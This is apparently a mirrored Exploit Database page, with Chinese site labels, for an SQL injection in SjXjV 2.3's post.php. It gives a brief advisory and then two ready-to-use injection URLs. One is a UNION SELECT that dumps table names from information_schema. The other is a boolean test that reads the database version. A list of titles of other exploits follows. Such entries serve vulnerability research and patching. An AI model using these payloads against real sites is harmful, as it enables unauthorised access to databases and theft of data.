SjXjV 2.3 – ‘post.php’ SQL Injection

Exploit Database
13 阅读

作者： 599eme Man

日期： 2011-10-28
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/36269/

source: https://www.securityfocus.com/bid/50426/info

SjXjV is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

SjXjV 2.3 is vulnerable; other versions may also be affected. 

http://www.example.com/post.php?fid=41&tid=-51%20union%20select%201,2,3,4,5,6,7,8,group_concat%28table_name%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables+where+table_schema%20=database%28%29--

http://www.example.com/post.php?fid=41&tid=51 and substring(@@version,1,1)=5

last Exploits
SjXjV 2.3 – ‘post.php’ SQL Injection的更多信息

mySeatXT 0.2134 – SQL Injection：
justVisual 2.0 – ‘index.php’ Local File Inclusion：
CITSmart ITSM 9.1.2.22 – LDAP Injection：
JasperReports – (Authenticated) File Read：
ASUS DSL-N14U B1 Router 1.1.2.3_345 – Change Administrator Password：
Joomla! Component Jtag Members Directory 5.3.7 – Arbitrary File Download：
PhpTax – ‘pfilez’ Execution Remote Code Injection (Metasploit)：
WhatsApp Desktop 0.3.9308 – Persistent Cross-Site Scripting：